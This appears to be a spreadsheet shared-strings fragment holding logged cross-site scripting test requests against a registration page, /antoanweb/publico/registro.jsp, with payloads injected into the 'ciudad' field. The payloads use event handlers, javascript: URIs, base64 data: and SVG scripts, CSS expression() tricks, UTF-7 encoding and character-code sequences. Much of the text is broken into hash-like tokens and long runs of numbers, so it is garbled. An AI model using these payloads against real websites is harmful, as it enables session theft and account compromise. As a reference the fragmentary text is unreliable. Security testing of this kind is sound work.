    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;bodyonscroll=49ec7df4c694c75bfeca2f7f919dcf4a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&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=x&lt;formid=testonforminput=javascript:8801a02db60672e5ee3c7acff878574d&gt;&lt;input&gt;&lt;form&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=x&lt;formid=test&gt;&lt;input&gt;&lt;form&gt;&lt;buttonform=testonformchange==javascript:d169d6d815aa074b4ce334f4ee6f65a5&gt;x</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;video&gt;&lt;sourceonerror="javascript:e2538f258320f0be49bfbff5ab1d8be1"&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=c2&amp;password=c2&amp;nombre=c&amp;apellidos=c&amp;email=c&amp;dni=234534576&amp;provincia=1&amp;cp=12354&amp;ntc=13&amp;b1=registrar&amp;direccion=c&amp;ciudad=&lt;videoonerror="javascript:b0572c8b919f4b75c2aaa1b02ed8618a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38ade0811325ce3b12266733b8d1c2a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1ff7f20d345c90e305ca8c947315c521'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efc6fa70a13d7783f9e85c6a4ead6668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/title&gt;e54a62f80ffe8ab4ad10fa4a0bf29483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624452d76e434da49d4d23be918f51c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/|\\]^`=8bc0cabd75501a81c615caddd88d0f00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ddbd49456f7e9daa0bd1e4ed10a67f7f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4e10be0ed39a6b5b8ab7ab7cbf83b0b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35778e0e06f7636c68eeac55ec3a8e9d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b29d8d7c566302bfa34559ba97e32938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65c62259f57d421bdb122b297fe29a2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b85186fc171d9e3071f9972ca274f9e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a8fedc5522e9b0630bbe914345409525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c2fc678ac4ca09226f63cffb6d76fbce/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2a413d96258691878fcd0f684cc4b76e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52608a3849942ddd3260242cdd2f671f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6d039acbb97ff2df8817f09ea12c57d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61dac8d6874ede3e347a89c5bdfaba8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b95b483ed25473b401e70e8043610a33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cef9f19103956a8552fcd0c84f36e3e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35bdbebf968e6a286dccf72c85de0b8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62368e343e6e6ec489639d7cab053a6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a5d7473424f82c5cac698fda2c528955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b16c8d0b00d88ec771f0ff87264669b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1457931a178d46a2fec63f43d23f2843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3272acdcb13dcfd5e7a43506065174fd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b5815e54d71b9e58fc38fbb2bc5ddd50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2a7206e0d025f6d86ffafa4bfb4e4d8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dc0223cc34bd8e0a086e0b3d5654940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b1875380ff513a98426facaeeaef8af1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7b03c70457b3ea57849c4f5b624fc27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e633c34631cc447d0c2248333ee9b73c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8c9bca785551e26b86681d3a9f736987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e9dffe8dd7e464e8a82793b72e1d848c"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onload=d24e9db21e999452d134428ce409b4e8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"onload=5181ffa7b7d34faf9f401cc270c56e74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/onload=afdcfb866bded0e6dd86d8e248e7309f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dbc4f2c887d9804687f822c788e44600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"onload=9872102b1834308f4bd8bad15f6df50e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690b4a01ce3a93c00c2e6272923959c4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d707133bbf405e3185cace33220f5726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b2e013c2560269e3f4a741640eaaecb6"&gt;&lt;/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25ed0cd1dfda39acc2981c24620aaf8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4a9ca040ea40b07b3a2e9469607268a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001a039387f8b310edcad27a4add2436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8eab0cc11e7022a9299724ceb58b8247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/*fdee5e318855f085bd92d6f2d1785633*/ession(fdee5e318855f085bd92d6f2d1785633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4cc3481b94247964952250710cf4a62style="xss:expression(f4cc3481b94247964952250710cf4a62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/javascript"&gt;fa2185ad01995ccb56262b6e58a689e9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e10cf1260cea0ce6aaab532730506d75{background-image:url("e10cf1260cea0ce6aaab532730506d75");}&lt;/style&gt;&lt;aclass=e10cf1260cea0ce6aaab532730506d75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/css"&gt;body{background:url("c4eba2e118d96a345a808c456ea73373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b2fbd64cb96eca0982721bdea280299c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c934616edfe1637426f65cf6da2f4466/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1649c4bc0d53ed2a746c5bbc9c4a7173&gt;&lt;/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f1c20b0d374b0b4b5fb005844fba0690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0d40e06d8856467eaf2407af4051c699&lt;/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06468b1df086716f4554d7e732dd9c14&amp;lt;/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/127.0.0.1&gt;d0498c0e4a6a00486167ac76b7a5dc0b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8bd32f5249e28b0df15d3644a5b8906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86f0a02617163953c0b7985b8acddcb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1866ada88ee7ceef9bdc8a635836dd6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d00cc5213662fe1bbfd98e341f80ff7a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/682b1f9907c571c01b47b19c45c931cc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d75be8681236d36fd4476a6fbc748cfc;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/;url=d20aef1f2c0b71c5bb25fcf9de52b0b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66f32a0a8c5a92c28c0451c9f8b36b22"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3dafeddddcf4d333702fa616d08b3719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/c2427bd3a7e1095b77fe6373117f7ada/nc2427bd3a7e1095b77fe6373117f7ada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ea3aa95fa252b0b93c5bbd655a92cd3e&gt;&lt;/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83c5df157879bdd99eac2080e1aeb0e3&lt;/style&gt;&lt;ul&gt;&lt;li&gt;83c5df157879bdd99eac2080e1aeb0e3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5ca34f29c08703bcc9809abe2dd8190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/html;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-e49b4119f0caf62e8cd4b8bb4b442c89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483c80b901c210952447b8622dc6cc7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8fe06a2f02528dc7df13a6dd83466f6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72caac24309410ff689afd88ce5d299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4a079f41cd4605e4b0db5fba69c3a538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fedecf812c6b78e331c5e9d5e5f0601e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0907562c6b49ea110fef9e5595f9e20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05a19e81d50f4b340f37b03778c5143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6a850f7fde9c733d0e8caec6eaaabd4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/style&gt;&lt;script&gt;a5add32e431a7012696c3434b4fc1146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1e4ca6d874038c5cd7c851d3fe895c37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f3792fb9acaaa2fb6d4708fc7534dead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246547932b0444bc7a955d2002ff9599;&lt;b&gt;&lt;/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71dc9e559b50498be1120a160b602d5a"&gt;&lt;/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c88c730d8dbb0acd84c6c608807e722f"&gt;]]&lt;/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/&gt;&lt;buttonform="test"formaction="javascript:5f3ed2dad5fae366ef5cdc5327833408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79f7a47c78815577a617502308600c45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c7ba325bb5e6b422dd74505fc98a02b7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95aa57b789b302859251dc85cb61edb8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b9fc612ddcc63b596302781b564f2745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a6a59d9dd1af2da06eafdcc1a426ac5e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4345c2390af40e620f82fc112eccfcab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899e52a90b889e5cd7a40a6109d4d364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02bdbe328ed40927e68900143d47ac59&gt;&lt;input&gt;&lt;/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/form&gt;&lt;buttonform=testonformchange==javascript:8e2205a27c5924b1bfbc3b5a254960d5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d2fee33828e1420e34d82540dc1a2f1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0e7b812f6199e49c7f13da82caceb76f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data:text/html;base64,jtnjc2nyaxb0jtnlywxlcnqoilhtuyipo2hpc3rvcnkuymfjaygpoyuzyy9zy3jpchqlm2uipjwvyt4=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data:text/html;base64,jtnjc2nyaxb0jtnlywxlcnqoilhtuyipo2hpc3rvcnkuymfjaygpoyuzyy9zy3jpchqlm2uipjwv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data:image/svg+xml;base64,phn2zyb4bwxuczpzdmc9imh0dha6ly93d3cudzmub3jnlziwmdavc3zniib4bwxucz0iahr0cdovl3d3dy53my5vcmcvmjawmc9zdmciihhtbg5zonhsaw5rpsjodhrwoi8vd3d3lnczlm9yzy8xotk5l3hsaw5riib2zxjzaw9upsixljaiihg9ijaiihk9ijaiihdpzhropsixotqiighlawdodd0imjawiibpzd0iehnzij48c2nyaxb0ihr5cgu9inrlehqvzwntyxnjcmlwdci+ywxlcnqoilhtuyipozwvc2nyaxb0pjwvc3znpg==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8a6bb2872c670173e11e611248b49bce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a5dced2ba283ded7b9fc886c0901e1d0'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e4747a794bf505e3110f99d46dc4974e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/title&gt;fd884b2fa9c4e4e543fabac5784eb7f3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67fb5bffd4aa36a65de27758c3f88d4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/|\\]^`=4c70c2e940733f1d6a35e33b0e85c9f8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38889510a24cff4959d6d89f15ff1ddd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cd77e818cc7ff3907981b35f652c523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f1d495b04b3b210384dbe08736989ea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fc13e4295145086349a77ac8294ab987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c47535bc8bd80ec5026467b08ea48cb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3679d3f744823d6cb0f065766a97a24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ea5a64ccee7bc014a5113ecebb34ed7d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c82fa7d4ea680ffef56d41c1c006ffe1/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bd50add2f51088aa3be2d0922a93009f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a7a7f4a6c7f4dc8475bd0e617c2a0242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b08fa34bca30a31d0a4b094c1df36f7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c57ed75c667231e9ffb4b7daa90004e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e61bdd586c7509cbbbba014de3e855d7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85aeb58dc13200adc93005a16650890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5a0e39a6863de579d3cdcb89edb88b3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da546384b0eaee1e220354aca07ce8a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3d5c5973e3a35093b0b3fcc5a13e8533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f11f33074d5f0058422179a95d5d7e4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f50d165402f7af6f9ac578767378f5d9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f44c453cb1d1536890359954d68d4d87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1293e09c25690b8e8018ccfd08df771d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15a87808e05ff10b4e57b5c5f54d6e0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7882fe58690570ff71288fc541f2a2a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093d6de8a00aa6f5e7c1b2aeb4616720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08f2432052949656a9c73cf995c7618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b5492065f60e090c415e02856bdba87a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58cc77ab3d98ba1a46c8763cc5d5de58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2f042a59ee7788496150f4283ce54c04"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onload=37ea02aac8ec6c0d661426f977941318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"onload=4d8b4f917937e7abc4653a78f4c220f4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/onload=1c3b1bee024feb4cb1529819eb70267b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d3ed74a3217ad3d084a7e4ba6800d7b0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"onload=026f9632835fb66c5888543ac9e427e7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bfd3fa8f2f0786a53b0eac266db99495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2e8bdcd812080ef7434e680f1bfb1988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155ee02aad2a17505b9950119996bc4c"&gt;&lt;/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353e5f4ee2ec82b653ef85446eb0070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b7fb286e35fd085c55aa6ec86a8cad0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f6198c78e53c6ceb790c287f1f017b52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abc232f2c95f0e673e727f275149f36d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/*96ae975ece58c7eeaea41477eec3d8dc*/ession(96ae975ece58c7eeaea41477eec3d8dc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2819c6acc6b6a90ee52b6c5b43831a2bstyle="xss:expression(2819c6acc6b6a90ee52b6c5b43831a2b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/javascript"&gt;3f14a6838dbe59e47d85cbc0692ccc6d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c621058e42b640a41f90d39ba4938c14{background-image:url("c621058e42b640a41f90d39ba4938c14");}&lt;/style&gt;&lt;aclass=c621058e42b640a41f90d39ba4938c14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/css"&gt;body{background:url("d92fd6cbfec6ffe2a4dd22c6c235da23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718d19604fd3c71c0d7a57e6d2d10dc1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398d1c968c6001b7a91bc1211e69e559/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0effe08b868a5b55ac5e2452f3bec540&gt;&lt;/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e08c63f18eba323c8fe41d3868872e66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914f3225d0ef68e327a3affab82fc9a2&lt;/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8b24c148afdf63312d3510d4fa3eb544&amp;lt;/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/127.0.0.1&gt;77e563d654eac2de0ac01f3ed3dbd6a8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f874a9b4a82c1a9fe2f3af2299ee0e8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52cf8a8d9261e65eb13ae99c36ab59e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cd3b36464315affd5f18f33fb641bc3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3ac105e8b19ec2f340f8ec06963b21be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/9cdeffae8ad7d31a01bdf5582a6e34bd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8593670de69c0ddef3987f14064cfacc;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/;url=eace4fd652c9a777bb59a1307d726d3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97cdcccda9a574b3ec748c8c1fae2891"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cbf907364237e320affa7600767c59d2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/20db3d058973173be5941407c037dd7e/n20db3d058973173be5941407c037dd7e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392bbd2ab45e9c2ea3dbb4785df97493&gt;&lt;/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56fecd4d99d9edefd7c4e3e0e5a1281b&lt;/style&gt;&lt;ul&gt;&lt;li&gt;56fecd4d99d9edefd7c4e3e0e5a1281b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cf32575b4e2daecb657b9acd4f37896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/html;charset=utf-7"&gt;&lt;/head&gt;+adw-script+ad4-5db2ec09ce5bfd736eb7cb491bd02967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7fb8f7282261f53b75ba2f8fbdaa7fb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4790fa4ac55c9fff4216c0d3589e7a8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316a084ec8cb7714629218f276a2cae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9562926c35c6f34850f21af186c602de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ae2c0ae36350a200923e08fa378026a5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540a68a655b07ce688862f295a70cdb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71457748edf9114ca30eef642263cff1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6b6d139bd025fdce9e09ff560a32da8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/style&gt;&lt;script&gt;0c294c1b31c36407d477c3f9a15db4c1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93142a30e353132b2c6aa1120a822618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bfc2b42107b5890daf16121985d0c455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a78881f79b74f92ae17282a7974f7a36;&lt;b&gt;&lt;/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5a38fbf9d574cb0a20726536ddce608e"&gt;&lt;/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4f93b00563c5dc6af3b925aee76135eb"&gt;]]&lt;/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/&gt;&lt;buttonform="test"formaction="javascript:42fde79f7e782474387d7055e8e0e6b2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cd10b202a648b0533de64c5ded2267f7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791efe288a88c73bdf3a938bd5fcd4d1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9f9ef2b8bb89861ccf2b8ac5fa653aff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006eed385f7fdcf0f7dfd9f259ea9c1c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1085db4ec8dd3d30e60e21f3591547aa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e10c8a7d9b41cd2646d931734ef0c1fa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b21266383d167c9d19f4097728b57f33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35c8168e2b6d1c23c23deffb0965f163&gt;&lt;input&gt;&lt;/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/form&gt;&lt;buttonform=testonformchange==javascript:998e4a054f48c73aedffbefbedc07bff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da07b0b101af2065246c475523cb7ef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33805ca17c6036e767f06992dfce5669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59a2598f0617cdf6cece74a7617b834a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0a9be0837131e664ce7cc46134f50eac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c1eadf56d0244547cc43d6bda418357c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6587fc7fc0ac51e3d2ffb2f300e2cbae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f059b1ba7f33cac0d619136c5d266f0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a87158946e1b5c314a81ab4baf630bf5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47ed4719d09a3139b6ba469f0c04b9dd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2caf73618ba4d487e996ec594b8365b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c17c4828e0c32a1f6d09456ae0933230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b649006ed38e74108d8fe4965c94d19c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be70b17f8220f0699867172cecda7e4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dedced46a73c5a466d2cdeb297b0a4a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fa0a69f7461a78f41a222a7fb2f0264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e8c572427b869f28965d051800473ed5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50eefd749c88881388691578c52bf443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07db85f6e48ef106ed1bd04a92d4edb0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6a629d8f2a13bfb68eeef59d3353c50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f56a845eab317c6ae40da34de4d58ed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7acc6274642b1f0fbf8985605f3eb03c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7c1b1a127a7d2054cfa9ef445dfdb9f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0e60b0d1f572f12cb9e151aa508a792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c8b117db4afae74193f2e6984630b0e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afa6944478044568018153711531cf06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8571c3c2b7edd28f691563883d3fd04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8b45cac60332339f776612a16299a7cd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021f9a6eec4005626183a2490b5308d8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aa2e5e9936a256866cdbe1eb863bd648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36ebd5aecaeb1c5f429174b1db14fd9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cca5fd4a4d200ac4973ab87ff75009c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bc0b0c87d614e698e28ef85a73d7e693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aafe116e0585d189b28cad273059bbc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c68b47b2e50566d2fb0cdbaa9e8650e5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e013476eccc82e448c7dd2e7eefc1b35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64f1bbae842b2df23649f8c99b306246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21aebcf0375cb74db038ec141c54583d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fb28722713f5d0940aa9908e7ccc30c5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2064320154bce3b6914039d05e228eb9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6d6efdffe5bab2055cff522cf4ed7ea0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13dc06c64afcacea9b05d2d3f1368ec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fa0f1ec5d7f99eca99826c5279048db3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bbed9b6080fef38f4ed7ff883c32f909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15a5c1ec593249f10f731b84a029e63d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5f4cf792643d2cf823fccf6c2a185fb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8fb82bfa5343ecaf0d0e3d1e5a61655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6b8dc8eb57f23e486ac894e1332809c4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0e460829eae096cc0cfd4ba6ebd2600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e5f00dc8c6ce87278b73ca007fa1036c*/ession(e5f00dc8c6ce87278b73ca007fa1036c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db40ff9335541ef791468e7b89daddfstyle="xss:expression(ddb40ff9335541ef791468e7b89daddf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81f682b68f6cd21f9dd423e329d6d489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be50448d4c2e1b2485f821718616e2e5{background-image:url("be50448d4c2e1b2485f821718616e2e5");}&lt;style&gt;&lt;aclass=be50448d4c2e1b2485f821718616e2e5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e6f6e52bed84de67685026a8b075ca4f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ca779b4e049d9ef353b17a08fa94c99d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b3c33da839bf6b8e505f05d54fdb3719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4110335b1a0858b9a9ddb8532e907aca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2694e74030affe86bf18bd54022af915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9135f84e8c51bcdf79330c33416bf390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2beea531176e03a94b3fcb2baf13f31e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762c00a1dbf059da4e72567282357bdd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caad4b4fdeb5d60a7029b74179adeeb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21e95eb8621d48e8036f05171bf463a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46dc0ee4b66aec44de86c053d9f0c72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6ae6ed433865f7727345a660a01b8a5a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6d76891d75f248b4d53160a6079f82d2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ea65e45cfd0a16a0642afaae40d0403e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fc2912187f2bb417c2f44f612de393a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2f99aa74e70635fcd9a668a93d4d6b7b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47f0957b5dac52b12638c26bf6cdbfea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c4e22bc13aefa4d5eefe1059a8a7fcee/nc4e22bc13aefa4d5eefe1059a8a7fcee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42b10a35a961584225ab313dc240b251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41f494124a0d4c8232d593c2046ea00b&lt;style&gt;&lt;ul&gt;&lt;li&gt;41f494124a0d4c8232d593c2046ea00b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a4726acd74ded7925c20e304c4f51a0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2f19253d2ee0dc522669581d635861b7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fed33bd8afae2d430dfbc9af2fcd9e9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addbe9b474514c00fbdcd0d3e80255c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bc6ec1029759bbe7170fb28a5dc1ae7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09ec87fb5b2775c479443afdb060cc7b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58b1a4a1fcc8dc18a7c690d4ff1d15b4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834a08787edc1e7ebf0319413e6bb1e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af95bc9417b7d1c5f219127bf6d028c6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40b7217ce387dea5975d48d9f19f4f4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ffa67b23d070fd9482d0e2ec8a2a1c6a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122b62fffb78b52e627b3af7714f434f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6e268913558d98daf4c95efac92f892e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86a15623f737dd0f49e47304680d8f6e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2f81b4cf41f5283a73dd71914fa6341e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074dd005164c7a984964b7edb4b2639e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fe31fd475fb5297002a5462b16b8fd3a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73338d60fade8270782722abf9a7245a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b7a8ad0893cd177ef06bb375bb05224d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9e1cd826132586fad892d6712823e9f2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220842fe6112c20595d547f8766252b2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c72c11e5ef1323b72b805c7782d10017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d06267012da536f9106205b5bc28ae5b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92fb7df2d43f352009589183d9a1376a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ace6497bc5f8f2a432b62b27a1b3630f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046b0ac5ea7f1411f6d6adc622c34c2b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b4f99c7dd4f7f8d5a0ec48df1bdde6c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6379b94972822cc548b38edb12f6a849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4ec959789335d5742d39ee60fff78443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f90451c3943e7d657dcbbda2482679f0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a35d4a274cda62957b549fd1e23dd385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8b8df26e7f6dc18bffbdf7959b8a93f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b21bd614ad3fc78061ee1d25e355052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ef341a2e8e841c1d165695517677d679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629e716c45c3430420a7483e7183c9a7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79c2bb62e83baca55fa6daec6309126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bdd6f0d6dd2349c202f9a7b0268128e7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266c59e4b79407d8f275dff5b5bf38ec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4d4b3fc300a48d2bf2c2ecef51fbfa5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8f620968956ad770227fda40e584a5b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919a24582c2e7b7b023b064647491565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e7a0aa2ae340ca61bbf0ec30a2c5ce49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0294ea341a1671196b48cd187eaba036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570898ebb0a415c037ae1569e7dcd50e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2e6b6ab7f2608615a8bdb8849de6110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e72f5e952da4ca90e688bc5486c2b7d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9b3df51e8b0424f42f6d6274a9572acd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54bb25e2968a9deb54d37aa60acda51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d87e1e445925378b570118a4a930550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0a457008179d8e06cf7df497623c7be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df3ae8f953937fd576661787c959ee3b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7a7d765a66611a37ef6e5f10de22dd5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819f882d649bf1e80866639c88f34368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c67f074f3fd79718dceb4d01efda2f18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edbd14548580f9e4d45923e419591ac2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e31d794b100be70c7d4d97462649577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cd418523c8f9cd464f77a9b773c7940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f9a3f4ac58cd313f4575769d98cf216b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a78eaba5bed80b8e5975bfa37c59696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5af62c7b56540466a242660550cbb084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70369029a876aebe470b052000b9ebaa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b46c39d0b881b0c819a1f05b50473d13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795a5bffa0f0ee151c3445f4cfdadd9e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42dd68efcd753301d21db1dfc3f37dd3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497d2636da88c730435dfbaac033cdf6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b8c8aff42565853f5e7d21a7ab9aa494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c61054c91abccac9d83b8c2e248d84e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9668568b5271d3ab2eac2996e9933d60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f57c7c19c1ee0ac26313aa22febb3352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1490fd0c548bcac25693946c7324b3e3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4b8060ab9507cd701cab059d246fd31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a9b91265a1365031c1b0123bd3fc426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3f18ad7c4245aed4195009e0da0b1f5c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4227689b4393808bdaf3a3ee2b9090b3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f8102439fd4ac4e3e418711be6d06807*/ession(f8102439fd4ac4e3e418711be6d06807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604c2cbbea3d81908a177aa8dc7c8b4bstyle="xss:expression(604c2cbbea3d81908a177aa8dc7c8b4b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6b3abe64fdfe69991866156de8135971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a96ed2ba595dcb4a800b20d6083864a4{background-image:url("a96ed2ba595dcb4a800b20d6083864a4");}&lt;style&gt;&lt;aclass=a96ed2ba595dcb4a800b20d6083864a4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1527127792e798b78f21a47b4451738e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451bbe860e8a0ccfab9ceae6abfe736f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e9452cc6e83ddb884f4871e7398d34ca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cb1448a9691e27a1bfcbb4513696f798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97c9259451cd7431ec5d53ab0c21f2b6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81e1f28d507487039e6d3ce662eba3da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3024af33e37466400dc1be525b1a006d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bf409e41dd39401089e0bd912e72e4fd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2a034892afd14fa949f993f4ef2934b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4e1d57af8b35e5d1beca4bd4ccaefd8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6bfdef4ca97d3b83b7650076c6b967b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1980745c50877e96c76cc55b81c4a2bb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a01ef8b23fa61a302e27cb0885189ac2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9a8269b1e6b3a2024ce416ecb6940039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9f628d485074088478ab0e4bb377d5e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436da622210eddc4fbd2899d68432ba9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05505f1db2a96eef2291c8f14df1f2b3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d25da87ef7c02ea216d3e1c767f4d206/nd25da87ef7c02ea216d3e1c767f4d206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ae48b670d300c98a3d9de867ef4c7562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aee2bdfb58c1c439924913e5b66864c8&lt;style&gt;&lt;ul&gt;&lt;li&gt;aee2bdfb58c1c439924913e5b66864c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32dcb6ff100fc8d3c84011e0f1dee05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ac13c9739e010f79b16332b29d335fe7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7002a4879e8b1b6bf6e9eebd9d54fbb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b72868ca4c31b8e632ce792f1e0c2fe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3873bc6cc40634a58510ffe960992ce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01b9b904e3b0542272401f222979d303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f306cc7237caa846eac0df454714fb23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690be84ebba3e1a37ea5f7f8b41e91b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eb3bf91576b2c174cab5d6b6d3d5d00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cf8c29e4abadeaaa8352b75555f8a60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a9ce731171355a792cea22ef7b49e372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8b6ead564d47c9f51f8e0a8ce118e742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24811055ee6d863779e7b1c7678e601f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3ec8bec34f37f7bc43d1ef2c9d7b0490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077d4471694df4f6021de883be6091dc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6ba49856e47150a7f15c9b4c5227bbdd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d665f0f61b7d2adc8de3bcb3b9c1b628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585b5d8987c067696a06febcad5b9a67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210f2bb5389db4db6c4ef9ddbb4f5b88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4021b1797943cc0c7d0c12de78d3b8be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085594ad4fbe85279441dc240442463a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6cf96664b62f1ad952805b6a588952e9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7b8ecb80c63d6bde2e8d991cbf7dc262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bd3f89b336b44fd7a7fbcd0ed562124e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db62fe75f55ee76b646ca2e0cb8d027a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7011c3afbbc6ef7ead8afb765353d6d2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04f0235a85a9b260d51cb43ae0ce562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c23be0a5f9e4a286fbf9cdf32ec17252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2,37,50,53,50,67,54,50,37,50,53,50,67,53,49,37,50,53,50,67,52,57,37,50,53,50,67,52,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,48,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,49,37,50,53,50,67,53,50,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,57,5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2,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,56,51,37,50,53,50,67,54,55,37,50,53,50,67,56,50,37,50,53,50,67,55,51,37,50,53,50,67,56,48,37,50,53,50,67,56,52,37,50,53,50,67,54,50,37,50,53,50,67,57,55,37,50,53,50,67,49,48,56,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,54,37,50,53,50,67,52,48,37,50,53,50,67,51,57,37,50,53,50,67,49,48,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,54,37,50,53,50,67,53,52,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,57,55,37,50,53,50,67,53,53,37,50,53,50,67,53,52,37,50,53,50,67,57,55,37,50,53,50,67,53,55,37,50,53,50,67,49,48,49,37,50,53,50,67,49,48,48,37,50,53,50,67,57,56,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,49,48,49,37,50,53,50,67,57,55,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,51,37,50,53,50,67,49,48,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,49,48,48,37,50,53,50,67,57,57,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,53,53,37,50,53,50,67,51,57,37,50,53,50,67,52,49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7,37,50,53,50,67,51,57,37,50,53,50,67,53,57,37,50,53,50,67,51,51,37,50,53,50,67,52,53,37,50,53,50,67,52,53,37,50,53,50,67,51,52,37,50,53,50,67,54,48,37,50,53,50,67,57,55,37,50,53,50,67,53,52,37,50,53,50,67,53,51,37,50,53,50,67,49,48,50,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,49,48,49,37,50,53,50,67,53,55,37,50,53,50,67,53,55,37,50,53,50,67,57,57,37,50,53,50,67,52,57,37,50,53,50,67,53,54,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,57,56,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,52,56,37,50,53,50,67,53,48,37,50,53,50,67,53,51,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,54,37,50,53,50,67,53,54,37,50,53,50,67,53,50,37,50,53,50,67,54,50,37,50,53,50,67,54,49,37,50,53,50,67,51,56,37,50,53,50,67,49,50,51,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,49,50,53,37,50,53,50,67,51,5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2,55,37,50,53,50,67,56,52,37,50,53,50,67,55,51,37,50,53,50,67,56,52,37,50,53,50,67,55,54,37,50,53,50,67,54,57,37,50,53,50,67,54,50,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,57,57,37,50,53,50,67,49,48,50,37,50,53,50,67,53,53,37,50,53,50,67,53,51,37,50,53,50,67,53,55,37,50,53,50,67,57,56,37,50,53,50,67,57,55,37,50,53,50,67,52,56,37,50,53,50,67,53,51,37,50,53,50,67,52,57,37,50,53,50,67,52,56,37,50,53,50,67,49,48,49,37,50,53,50,67,52,57,37,50,53,50,67,49,48,49,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,53,54,37,50,53,50,67,53,49,37,50,53,50,67,57,57,37,50,53,50,67,57,56,37,50,53,50,67,53,48,37,50,53,50,67,57,57,37,50,53,50,67,57,55,37,50,53,50,67,53,50,37,50,53,50,67,52,56,37,50,53,50,67,53,52,37,50,53,50,67,53,4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2,37,50,53,50,67,54,50,37,50,53,50,67,54,48,37,50,53,50,67,49,48,53,37,50,53,50,67,49,48,57,37,50,53,50,67,49,48,51,37,50,53,50,67,51,50,37,50,53,50,67,49,49,53,37,50,53,50,67,49,49,52,37,50,53,50,67,57,57,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,49,50,48,37,50,53,50,67,53,56,37,50,53,50,67,49,50,48,37,50,53,50,67,51,52,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,49,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,52,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,52,37,50,53,50,67,54,49,37,50,53,50,67,51,52,37,50,53,50,67,53,51,37,50,53,50,67,57,57,37,50,53,50,67,53,52,37,50,53,50,67,52,57,37,50,53,50,67,49,48,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,49,48,50,37,50,53,50,67,53,52,37,50,53,50,67,53,48,37,50,53,50,67,49,48,48,37,50,53,50,67,53,53,37,50,53,50,67,53,49,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,57,55,37,50,53,50,67,53,51,37,50,53,50,67,53,50,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,53,48,37,50,53,50,67,53,48,37,50,53,50,67,49,48,50,37,50,53,50,67,57,55,37,50,53,50,67,53,54,37,50,53,50,67,57,57,37,50,53,50,67,53,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,50,37,50,53,50,67,49,48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5,57,37,50,53,50,67,54,56,37,50,53,50,67,56,57,37,50,53,50,67,51,50,37,50,53,50,67,49,49,49,37,50,53,50,67,49,49,48,37,50,53,50,67,49,48,56,37,50,53,50,67,49,49,49,37,50,53,50,67,57,55,37,50,53,50,67,49,48,48,37,50,53,50,67,51,51,37,50,53,50,67,51,53,37,50,53,50,67,51,54,37,50,53,50,67,51,55,37,50,53,50,67,51,56,37,50,53,50,67,52,48,37,50,53,50,67,52,49,37,50,53,50,67,52,50,37,50,53,50,67,49,50,54,37,50,53,50,67,52,51,37,50,53,50,67,52,53,37,50,53,50,67,57,53,37,50,53,50,67,52,54,37,50,53,50,67,52,52,37,50,53,50,67,53,56,37,50,53,50,67,53,57,37,50,53,50,67,54,51,37,50,53,50,67,54,52,37,50,53,50,67,57,49,37,50,53,50,67,52,55,37,50,53,50,67,49,50,